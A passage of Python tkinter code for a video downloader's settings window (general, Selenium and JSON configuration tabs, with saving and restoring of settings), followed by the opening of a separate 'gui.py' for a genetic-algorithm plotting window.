for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
if browser_var.get() == 'Firefox':
##
Y_CORD1 = 180
Y_CORD2 = 200
Y_CORD3 = 196
self.browser_profile_label.place(x=15, y=Y_CORD1)
self.browser_profile_entry.place(x=15, y=Y_CORD2)
self.browser_profile_button.place(x=292, y=Y_CORD3)
##
Y_CORD1 = 250
Y_CORD2 = 270
self.which_link_label.place(x=15, y=Y_CORD1)
self.which_link_entry.place(x=15, y=Y_CORD2)
else:
self.browser_profile_label.place_forget()
self.browser_profile_entry.place_forget()
self.browser_profile_button.place_forget()
##
Y_CORD1 = 180
Y_CORD2 = 200
self.which_link_label.place(x=15, y=Y_CORD1)
self.which_link_entry.place(x=15, y=Y_CORD2)
# general
def update_general_dropdowns(self):
self.update_apply_button()
if auto_fill_formats_var.get():
self.quality_dropdown.configure(state=NORMAL)
self.audio_dropdown.configure(state=NORMAL)
self.ext_dropdown.configure(state=NORMAL)
self.click_dropdown.configure(state=NORMAL)
elif not auto_fill_formats_var.get():
self.quality_dropdown.configure(state=DISABLED)
self.audio_dropdown.configure(state=DISABLED)
self.ext_dropdown.configure(state=DISABLED)
self.click_dropdown.configure(state=DISABLED)
def browse_initialdir(self):
self.update_apply_button()
if len(initialdir_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir='C:/', parent=self.settings_win)
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, browse)
self.initialdir_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=initialdir_var.get(), parent=self.settings_win)
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, browse)
self.initialdir_entry.configure(state=DISABLED)
def destination_autofill(self):
self.update_apply_button()
if len(auto_fill_destination_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir='C:/', parent=self.settings_win)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, browse)
self.auto_fill_destination_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=auto_fill_destination_var.get(), parent=self.settings_win)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, browse)
self.auto_fill_destination_entry.configure(state=DISABLED)
# selenium
def browse_for_path(self):
self.update_apply_button()
with open(self.name_of_json) as f:
data = json.load(f)
for key, value in data.items():
if key == 'settings':
for general_name, general_detail in value[0].items():
pass
if len(browser_path_var.get()) <= 2:
browse = filedialog.askopenfilename(initialdir=general_detail['initialdir'], title="Select WebDriver",
filetypes=(("executable files", "*.exe"), ("all files", "*.*")), parent=self.settings_win)
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, browse)
self.browser_path_entry.configure(state=DISABLED)
else:
browse = filedialog.askopenfilename(initialdir=browser_path_var.get(), title="Select WebDriver",
filetypes=(("executable files", "*.exe"), ("all files", "*.*")), parent=self.settings_win)
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, browse)
self.browser_path_entry.configure(state=DISABLED)
def browse_for_profile(self):
self.update_apply_button()
messagebox.showwarning("!!! BE AWARE !!!",
"Please note that if you are going to put your default profile here, please don't as it could cause harm.\n\n"
"To be safe, just create a new profile and copy everything from the default into the new one to be safe of no corruption.",
parent=self.settings_win)
with open(self.name_of_json) as f:
data = json.load(f)
for key, value in data.items():
if key == 'settings':
for general_name, general_detail in value[0].items():
pass
if len(browser_profile_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir=general_detail['initialdir'], title="Select Profile", parent=self.settings_win)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, browse)
self.browser_profile_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=browser_profile_var.get(), title="Select Profile", parent=self.settings_win)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, browse)
self.browser_profile_entry.configure(state=DISABLED)
# threading
def general_thread(self):
thread = threading.Thread(target=self.general_settings)
thread.start()
def selenium_thread(self):
thread2 = threading.Thread(target=self.selenium_settings)
thread2.start()
def config_thread(self):
thread3 = threading.Thread(target=self.configuration_settings)
thread3.start()
# settings
def delete_wigits(self):
try:
if str(self.general_tab['state']) == 'disabled':
# general
self.initialdir_label.destroy()
self.initialdir_entry.destroy()
self.initialdir_button.destroy()
self.remove_done_messagebox_check.destroy()
self.auto_fill_destination_lbl.destroy()
self.auto_fill_destination_entry.destroy()
self.auto_fill_destination_btn.destroy()
self.remove_editformats_messagebox_check.destroy()
self.auto_fill_formats_check.destroy()
self.quality_dropdown.destroy()
self.audio_dropdown.destroy()
self.ext_dropdown.destroy()
self.click_dropdown.destroy()
elif str(self.selenium_tab['state']) == 'disabled':
# selenium
self.browser_list_label.destroy()
self.browser_list.destroy()
self.browser_path_label.destroy()
self.browser_path_entry.destroy()
self.browser_path_button.destroy()
self.browser_profile_label.destroy()
self.browser_profile_entry.destroy()
self.browser_profile_button.destroy()
self.which_link_label.destroy()
self.which_link_entry.destroy()
elif str(self.config_tab['state']) == 'disabled':
# config
self.name_of_json_label.destroy()
self.name_of_json_entry.destroy()
self.dont_save_file_options_check.destroy()
self.dont_save_download_options_check.destroy()
self.dont_save_other_options_check.destroy()
except:
pass
def general_settings(self):
global initialdir_var, remove_done_messagebox_var, auto_fill_destination_var, \
remove_editformats_messagebox_var, auto_fill_formats_var, quality_dropdown_var, audio_dropdown_var, ext_dropdown_var, click_dropdown_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=NORMAL)
self.general_tab.config(state=DISABLED)
self.config_tab.config(state=NORMAL)
self.restore_settings.configure(text="Restore General Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
self.initialdir_label = Label(self.settings_win, text="When you click \"Browse\", open this folder for your initial directory:", bg='#cbdbfc')
self.initialdir_label.place(x=4, y=40)
initialdir_var = StringVar()
self.initialdir_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=initialdir_var)
self.initialdir_entry.place(x=4, y=62)
if len(initialdir_var.get()) <= 1:
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, self.sync_general_detail['initialdir'])
self.initialdir_entry.configure(state=DISABLED)
self.initialdir_button = ttk.Button(self.settings_win, text="Set InitialDir", style='option5_5.TButton', state=NORMAL, command=self.browse_initialdir)
self.initialdir_button.place(x=280, y=60)
remove_done_messagebox_var = BooleanVar()
self.remove_done_messagebox_check = ttk.Checkbutton(self.settings_win, text="Disable the messagebox after you click \"Done\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=remove_done_messagebox_var, command=self.update_apply_button)
self.remove_done_messagebox_check.place(x=4, y=100)
remove_done_messagebox_var.set(self.sync_general_detail['disable_done_messagebox'])
self.auto_fill_destination_lbl = Label(self.settings_win, text="On loading, auto-fill the \"Destination\" to a certain destination:", bg='#cbdbfc')
self.auto_fill_destination_lbl.place(x=4, y=140)
auto_fill_destination_var = StringVar()
self.auto_fill_destination_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=auto_fill_destination_var)
self.auto_fill_destination_entry.place(x=4, y=162)
if len(auto_fill_destination_var.get()) <= 1:
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, self.sync_general_detail['auto_fill_destination'])
self.auto_fill_destination_entry.configure(state=DISABLED)
self.auto_fill_destination_btn = ttk.Button(self.settings_win, text="Set Auto-Fill", style='option5_5.TButton', state=NORMAL, command=self.destination_autofill)
self.auto_fill_destination_btn.place(x=280, y=160)
remove_editformats_messagebox_var = BooleanVar()
self.remove_editformats_messagebox_check = ttk.Checkbutton(self.settings_win, text="Disabled the messagebox after you click \"Edit Formats\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=remove_editformats_messagebox_var, command=self.update_apply_button)
self.remove_editformats_messagebox_check.place(x=4, y=200)
remove_editformats_messagebox_var.set(self.sync_general_detail['disabled_editformat_messagebox'])
auto_fill_formats_var = BooleanVar()
self.auto_fill_formats_check = ttk.Checkbutton(self.settings_win, text="On loading, auto-set all formats to chosen formats and auto-click \"Done\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=auto_fill_formats_var, command=self.update_general_dropdowns)
self.auto_fill_formats_check.place(x=4, y=240)
auto_fill_formats_var.set(self.sync_general_detail['auto_format_and_click'])
quality_btn_options = [
"1080p",
"1080p",
"720p",
"480p",
"360p",
"NONE"
]
audio_btn_options = [
"1441k",
"1441k",
"800k",
"467k",
"258k",
"NONE"
]
ext_btn_options = [
"MP4",
"MP4",
"MP3",
"MKV",
"WEBM",
"WAV",
"FLV",
"M4A",
"AVI",
"OGG"
]
click_btn_options = [
"Auto-Click",
"Auto-Click",
"Don't Auto-Click"
]
quality_dropdown_var = StringVar()
self.quality_dropdown = ttk.OptionMenu(self.settings_win, quality_dropdown_var, *quality_btn_options, command=self.update_apply_button_with_event)
self.quality_dropdown.place(x=20, y=266, width=80)
quality_dropdown_var.set(self.sync_general_detail['formats'][0])
audio_dropdown_var = StringVar()
self.audio_dropdown = ttk.OptionMenu(self.settings_win, audio_dropdown_var, *audio_btn_options, command=self.update_apply_button_with_event)
self.audio_dropdown.place(x=120, y=266, width=80)
audio_dropdown_var.set(self.sync_general_detail['formats'][1])
ext_dropdown_var = StringVar()
self.ext_dropdown = ttk.OptionMenu(self.settings_win, ext_dropdown_var, *ext_btn_options, command=self.update_apply_button_with_event)
self.ext_dropdown.place(x=220, y=266, width=80)
ext_dropdown_var.set(self.sync_general_detail['formats'][2])
click_dropdown_var = StringVar()
self.click_dropdown = ttk.OptionMenu(self.settings_win, click_dropdown_var, *click_btn_options, command=self.update_apply_button_with_event)
self.click_dropdown.place(x=320, y=266, width=130)
click_dropdown_var.set(self.sync_general_detail['formats'][3])
if auto_fill_formats_var.get():
self.quality_dropdown.configure(state=NORMAL)
self.audio_dropdown.configure(state=NORMAL)
self.ext_dropdown.configure(state=NORMAL)
self.click_dropdown.configure(state=NORMAL)
elif not auto_fill_formats_var.get():
self.quality_dropdown.configure(state=DISABLED)
self.audio_dropdown.configure(state=DISABLED)
self.ext_dropdown.configure(state=DISABLED)
self.click_dropdown.configure(state=DISABLED)
def selenium_settings(self):
global browser_var, browser_path_var, browser_profile_var, which_link_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=DISABLED)
self.general_tab.config(state=NORMAL)
self.config_tab.config(state=NORMAL)
self.restore_settings.configure(text="Restore Selenium Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
##
self.browser_list_label = Label(self.settings_win, text="Preferred Browser: (REQUIRED)", bg='#cbdbfc')
self.browser_list_label.place(x=15, y=40)
self.browsers = [
'Firefox',
'Firefox',
'Chrome',
'Safari',
'Opera',
'Edge',
'Internet Explorer'
]
browser_var = StringVar()
self.browser_list = ttk.OptionMenu(self.settings_win, browser_var, *self.browsers, command=self.update_apply_button_with_event)
self.browser_list.place(x=15, y=65, width=120)
browser_var.set(self.sync_sel_detail['browser'])
##
self.browser_path_label = Label(self.settings_win, text="PATH directory for WebDriver: (REQUIRED)", bg='#cbdbfc')
self.browser_path_label.place(x=15, y=110)
browser_path_var = StringVar()
self.browser_path_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=browser_path_var)
self.browser_path_entry.place(x=15, y=130)
self.browser_path_button = ttk.Button(self.settings_win, text="Set PATH", style='option5_5.TButton', state=NORMAL, command=self.browse_for_path)
self.browser_path_button.place(x=292, y=126)
##
Y_CORD1 = 180
Y_CORD2 = 200
Y_CORD3 = 196
self.browser_profile_label = Label(self.settings_win, text="PATH directory for Firefox Profile: (OPTIONAL)", bg='#cbdbfc')
self.browser_profile_label.place(x=15, y=Y_CORD1)
browser_profile_var = StringVar()
self.browser_profile_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=browser_profile_var)
self.browser_profile_entry.place(x=15, y=Y_CORD2)
self.browser_profile_button = ttk.Button(self.settings_win, text="Set PROFILE", style='option5_5.TButton', state=NORMAL, command=self.browse_for_profile)
self.browser_profile_button.place(x=292, y=Y_CORD3)
if self.sync_sel_detail['browser'] != 'Firefox':
self.browser_profile_label.place_forget()
self.browser_profile_entry.place_forget()
self.browser_profile_button.place_forget()
##
Y_CORD1 = 180
Y_CORD2 = 200
if self.sync_sel_detail['browser'] == 'Firefox':
Y_CORD1 = 250
Y_CORD2 = 270
self.which_link_label = Label(self.settings_win, text="Enter which link to load when selenium is open: (default: https://www.youtube.com/)", bg='#cbdbfc')
self.which_link_label.place(x=15, y=Y_CORD1)
which_link_var = StringVar()
self.which_link_entry = Entry(self.settings_win, width=45, state=NORMAL, relief=SOLID, textvariable=which_link_var)
self.which_link_entry.place(x=15, y=Y_CORD2)
self.which_link_entry.bind("<Key>", self.update_apply_button_with_event)
##
if len(which_link_var.get()) <= 1:
self.which_link_entry.delete(0, END)
self.which_link_entry.insert(0, self.sync_sel_detail['link'])
if len(browser_path_var.get()) <= 1:
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, self.sync_sel_detail['path'])
self.browser_path_entry.configure(state=DISABLED)
if len(browser_profile_var.get()) <= 1:
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, self.sync_sel_detail['profile'])
self.browser_profile_entry.configure(state=DISABLED)
def configuration_settings(self):
global name_of_json_var, dont_save_file_options_var, dont_save_download_options_var, dont_save_other_options_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=NORMAL)
self.general_tab.config(state=NORMAL)
self.config_tab.config(state=DISABLED)
self.restore_settings.configure(text="Restore Config Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
self.name_of_json_label = Label(self.settings_win, text="Name of the .JSON file: (default: settings.json)", bg='#cbdbfc')
self.name_of_json_label.place(x=15, y=40)
name_of_json_var = StringVar()
self.name_of_json_entry = Entry(self.settings_win, width=45, state=NORMAL, relief=SOLID, textvariable=name_of_json_var)
self.name_of_json_entry.place(x=15, y=60)
self.name_of_json_entry.bind("<Key>", self.update_apply_button_with_event)
if len(name_of_json_var.get()) <= 1:
self.name_of_json_entry.delete(0, END)
self.name_of_json_entry.insert(0, self.sync_config_detail['name'])
dont_save_file_options_var = BooleanVar()
self.dont_save_file_options_check = ttk.Checkbutton(self.settings_win, text="Don't save File Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_file_options_var, command=self.update_apply_button)
self.dont_save_file_options_check.place(x=15, y=110)
dont_save_file_options_var.set(self.sync_config_detail['dont_save_file_options'])
dont_save_download_options_var = BooleanVar()
self.dont_save_download_options_check = ttk.Checkbutton(self.settings_win, text="Don't save Download Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_download_options_var, command=self.update_apply_button)
self.dont_save_download_options_check.place(x=15, y=140)
dont_save_download_options_var.set(self.sync_config_detail['dont_save_download_options'])
dont_save_other_options_var = BooleanVar()
self.dont_save_other_options_check = ttk.Checkbutton(self.settings_win, text="Don't save Other Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_other_options_var, command=self.update_apply_button)
self.dont_save_other_options_check.place(x=15, y=170)
dont_save_other_options_var.set(self.sync_config_detail['dont_save_other_options'])
@property
def name_of_json(self):
with open('temp.json') as f:
data = json.load(f)
return data['name']
def restore(self):
if str(self.general_tab['state']) == 'disabled':
self.initialdir_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.auto_fill_destination_entry.delete(0, END)
remove_done_messagebox_var.set(False)
auto_fill_destination_var.set('')
remove_editformats_messagebox_var.set(False)
auto_fill_formats_var.set(False)
self.quality_dropdown.configure(state=NORMAL); self.audio_dropdown.configure(state=NORMAL); self.ext_dropdown.configure(state=NORMAL); self.click_dropdown.configure(state=NORMAL)
quality_dropdown_var.set("1080p")
audio_dropdown_var.set("1441k")
ext_dropdown_var.set("MP4")
click_dropdown_var.set("Auto-Click")
self.quality_dropdown.configure(state=DISABLED); self.audio_dropdown.configure(state=DISABLED); self.ext_dropdown.configure(state=DISABLED); self.click_dropdown.configure(state=DISABLED)
self.initialdir_entry.configure(state=DISABLED)
self.auto_fill_destination_entry.configure(state=DISABLED)
elif str(self.selenium_tab['state']) == 'disabled':
browser_var.set('Firefox')
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.configure(state=DISABLED)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.configure(state=DISABLED)
self.which_link_entry.delete(0, END)
self.which_link_entry.insert(0, "https://www.youtube.com/")
elif str(self.config_tab['state']) == 'disabled':
self.name_of_json_entry.delete(0, END)
self.name_of_json_entry.insert(0, 'settings.json')
dont_save_file_options_var.set(False)
dont_save_download_options_var.set(False)
dont_save_other_options_var.set(False)
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=DISABLED)
def settings(self):
if self._stabalize[3] == 1:
self.download_btn.configure(state=DISABLED)
self.settings_win = Toplevel()
self.settings_win.title(self._title)
self.settings_win.iconbitmap(self._icon)
self.settings_win.resizable(False, False)
self.settings_win.configure(bg='#cbdbfc', bd=5)
self.settings_win.geometry(self._size)
self.settings_win.protocol("WM_DELETE_WINDOW", lambda: reset_settings_window(self.settings_win, self.download_btn, self.done_btn, self._stabalize, self.apply_btn))
border = LabelFrame(self.settings_win, height=368.5, width=549.5, bg='#cbdbfc', bd=4, font="Cooper 18", labelanchor=N, relief=SOLID)
border.place(x=-5, y=-4)
style21 = ttk.Style()
style21.configure('option5_5.TButton', background='black', width=12)
style21.configure('option6.TButton', background='black', width=7)
style21.configure('option7.TButton', background='black', width=22)
style21.configure('option8.TButton', background='black', width=20, borderwidth=1, focusthickness=3)
style21.map('option8.TButton', background=[('active', '#d2d2d2')])
style21.configure('option9.TCheckbutton', background='#cbdbfc')
self.selenium_tab = ttk.Button(self.settings_win, text="Selenium Settings", style='option8.TButton', state=NORMAL, command=self.selenium_thread)
self.selenium_tab.place(x=75, y=2)
self.general_tab = ttk.Button(self.settings_win, text="General Settings", style='option8.TButton', state=NORMAL, command=self.general_thread)
self.general_tab.place(x=205, y=2)
self.config_tab = ttk.Button(self.settings_win, text="Configuration Settings", style='option8.TButton', state=NORMAL, command=self.config_thread)
self.config_tab.place(x=335, y=2)
self.restore_settings = ttk.Button(self.settings_win, text="", style='option7.TButton', state=NORMAL, command=self.restore, width=25)
self.restore_settings.place(x=1, y=335)
self.apply_btn = ttk.Button(self.settings_win, text="Apply", state=DISABLED, style='option6.TButton', command=self.apply_settings)
self.apply_btn.place(x=488, y=335)
exit_btn = ttk.Button(self.settings_win, text="Exit", style='option6.TButton',
command=lambda: reset_settings_window(self.settings_win, self.download_btn, self.done_btn, self._stabalize, self.apply_btn))
exit_btn.place(x=418, y=335)
self.general_settings()
for index, var in enumerate(self._stabalize):
self._stabalize[index] += 1
print(self._stabalize)
def hold_variables(self, apply_btn, win):
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
if str(apply_btn['state']) == 'normal':
choice = messagebox.askyesno("???", "You have unsaved changed.\nAre you sure you want to Exit?", parent=win)
if choice == 1:
self.sync_general_detail['initialdir'] = self.general_detail['initialdir']
self.sync_general_detail['disable_done_messagebox'] = self.general_detail['disable_done_messagebox']
self.sync_general_detail['auto_fill_destination'] = self.general_detail['auto_fill_destination']
self.sync_general_detail['disabled_editformat_messagebox'] = self.general_detail['disabled_editformat_messagebox']
self.sync_general_detail['auto_format_and_click'] = self.general_detail['auto_format_and_click']
self.sync_general_detail['formats'][0] = self.general_detail['formats'][0]
self.sync_general_detail['formats'][1] = self.general_detail['formats'][1]
self.sync_general_detail['formats'][2] = self.general_detail['formats'][2]
self.sync_general_detail['formats'][3] = self.general_detail['formats'][3]
self.sync_sel_detail['browser'] = self.sel_detail['browser']
self.sync_sel_detail['path'] = self.sel_detail['path']
self.sync_sel_detail['profile'] = self.sel_detail['profile']
self.sync_sel_detail['link'] = self.sel_detail['link']
self.sync_config_detail['name'] = self.config_detail['name']
self.sync_config_detail['dont_save_file_options'] = self.config_detail['dont_save_file_options']
self.sync_config_detail['dont_save_download_options'] = self.config_detail['dont_save_download_options']
self.sync_config_detail['dont_save_other_options'] = self.config_detail['dont_save_other_options']
with open('settings.json', 'w') as f:
json.dump(self.data, f, indent=3)
win.destroy()
else:
pass
else:
win.destroy()
def apply_settings(self):
with open(self.name_of_json) as f:
self.data = json.load(f)
with open('temp.json') as d:
other_data = json.load(d)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
# the if statements will make it so if you make a change but dont switch tab, then it will instead save it here
if str(self.general_tab['state']) == 'disabled':
self.sync_general_detail['initialdir'] = initialdir_var.get()
self.sync_general_detail['disable_done_messagebox'] = remove_done_messagebox_var.get()
self.sync_general_detail['auto_fill_destination'] = auto_fill_destination_var.get()
self.sync_general_detail['disabled_editformat_messagebox'] = remove_editformats_messagebox_var.get()
self.sync_general_detail['auto_format_and_click'] = auto_fill_formats_var.get()
self.sync_general_detail['formats'][0] = quality_dropdown_var.get()
self.sync_general_detail['formats'][1] = audio_dropdown_var.get()
self.sync_general_detail['formats'][2] = ext_dropdown_var.get()
self.sync_general_detail['formats'][3] = click_dropdown_var.get()
elif str(self.selenium_tab['state']) == 'disabled':
self.sync_sel_detail['browser'] = browser_var.get()
self.sync_sel_detail['path'] = browser_path_var.get()
self.sync_sel_detail['profile'] = browser_profile_var.get()
self.sync_sel_detail['link'] = which_link_var.get()
elif str(self.config_tab['state']) == 'disabled':
self.sync_config_detail['name'] = name_of_json_var.get()
self.sync_config_detail['dont_save_file_options'] = dont_save_file_options_var.get()
self.sync_config_detail['dont_save_download_options'] = dont_save_download_options_var.get()
self.sync_config_detail['dont_save_other_options'] = dont_save_other_options_var.get()
if self.sync_config_detail['name'].endswith('.json'):
# saving it to the actual settings dict
self.general_detail['initialdir'] = self.sync_general_detail['initialdir']
self.general_detail['disable_done_messagebox'] = self.sync_general_detail['disable_done_messagebox']
self.general_detail['auto_fill_destination'] = self.sync_general_detail['auto_fill_destination']
self.general_detail['disabled_editformat_messagebox'] = self.sync_general_detail['disabled_editformat_messagebox']
self.general_detail['auto_format_and_click'] = self.sync_general_detail['auto_format_and_click']
self.general_detail['formats'][0] = self.sync_general_detail['formats'][0]
self.general_detail['formats'][1] = self.sync_general_detail['formats'][1]
self.general_detail['formats'][2] = self.sync_general_detail['formats'][2]
self.general_detail['formats'][3] = self.sync_general_detail['formats'][3]
self.sel_detail['browser'] = self.sync_sel_detail['browser']
self.sel_detail['path'] = self.sync_sel_detail['path']
self.sel_detail['profile'] = self.sync_sel_detail['profile']
self.sel_detail['link'] = self.sync_sel_detail['link']
self.config_detail['name'] = self.sync_config_detail['name']
self.config_detail['dont_save_file_options'] = self.sync_config_detail['dont_save_file_options']
self.config_detail['dont_save_download_options'] = self.sync_config_detail['dont_save_download_options']
self.config_detail['dont_save_other_options'] = self.sync_config_detail['dont_save_other_options']
other_data.update(prev_name=other_data.get('name'))
other_data.update(name=self.config_detail['name'])
# saving to file
with open(other_data.get('prev_name'), 'w') as f:
json.dump(self.data, f, indent=3)
f.close()
with open('temp.json', 'w') as d:
json.dump(other_data, d, indent=3)
d.close()
# renaming the file if necessary
if other_data.get('prev_name') and other_data.get('name') != 'settings.json':
os.rename(other_data.get('prev_name'), other_data.get('name'))
self.apply_btn.configure(state=DISABLED)
else:
messagebox.showwarning("???", "JSON filename must end with '.json'", parent=self.settings_win)
# noinspection PyUnresolvedReferences
class JsonWorker(SettingsWindow):
def __init__(self, general, selenium, config, version=None, download_btn=None, done_btn=None, stabalize=None):
SettingsWindow.__init__(self, version, download_btn, done_btn, stabalize)
self.general = general
self.selenium = selenium
self.config = config
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
def work(self):
if str(self.general['state']) == 'disabled':
self.work_general()
if str(self.selenium['state']) == 'disabled':
self.work_selenium()
if str(self.config['state']) == 'disabled':
self.work_config()
# saving to file
with open(self.name_of_json, 'w') as f:
json.dump(self.data, f, indent=3)
def work_general(self):
if initialdir_var.get() != self.sync_general_detail['initialdir']:
self.sync_general_detail['initialdir'] = initialdir_var.get()
if remove_done_messagebox_var.get() != self.sync_general_detail['disable_done_messagebox']:
self.sync_general_detail['disable_done_messagebox'] = remove_done_messagebox_var.get()
if auto_fill_destination_var.get() != self.sync_general_detail['auto_fill_destination']:
self.sync_general_detail['auto_fill_destination'] = auto_fill_destination_var.get()
if remove_editformats_messagebox_var.get() != self.sync_general_detail['disabled_editformat_messagebox']:
self.sync_general_detail['disabled_editformat_messagebox'] = remove_editformats_messagebox_var.get()
if auto_fill_formats_var.get() != self.sync_general_detail['auto_format_and_click']:
self.sync_general_detail['auto_format_and_click'] = auto_fill_formats_var.get()
if auto_fill_formats_var.get():
if quality_dropdown_var.get() != self.sync_general_detail['formats'][0]:
self.sync_general_detail['formats'][0] = quality_dropdown_var.get()
if audio_dropdown_var.get() != self.sync_general_detail['formats'][1]:
self.sync_general_detail['formats'][1] = audio_dropdown_var.get()
if ext_dropdown_var.get() != self.sync_general_detail['formats'][2]:
self.sync_general_detail['formats'][2] = ext_dropdown_var.get()
if click_dropdown_var.get() != self.sync_general_detail['formats'][3]:
self.sync_general_detail['formats'][3] = click_dropdown_var.get()
def work_selenium(self):
if browser_var.get() != self.sync_sel_detail['browser']:
self.sync_sel_detail['browser'] = browser_var.get()
if browser_path_var.get() != self.sync_sel_detail['path']:
self.sync_sel_detail['path'] = browser_path_var.get()
if self.sync_sel_detail['browser'] == 'Firefox':
if browser_profile_var.get() != self.sync_sel_detail['profile']:
self.sync_sel_detail['profile'] = browser_profile_var.get()
if which_link_var.get() != self.sync_sel_detail['link']:
self.sync_sel_detail['link'] = which_link_var.get()
def work_config(self):
if name_of_json_var.get() != self.sync_config_detail['name']:
self.sync_config_detail['name'] = name_of_json_var.get()
if dont_save_file_options_var.get() != self.sync_config_detail['dont_save_file_options']:
self.sync_config_detail['dont_save_file_options'] = dont_save_file_options_var.get()
if dont_save_download_options_var.get() != self.sync_config_detail['dont_save_download_options']:
self.sync_config_detail['dont_save_download_options'] = dont_save_download_options_var.get()
if dont_save_other_options_var.get() != self.sync_config_detail['dont_save_other_options']:
self.sync_config_detail['dont_save_other_options'] = dont_save_other_options_var.get()
|
gui.py
|
import tkinter as tk
from tkinter import END
from tkinter import ttk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg,
)
from gnt import *
from matplotlib.ticker import MaxNLocator
import threading
class MainWindow:
def __init__(self, root, color):
self.color = color
self.root = root
self.root.resizable(0, 0)
self.root.geometry("700x850")
self.root.title("Γενετικοί")
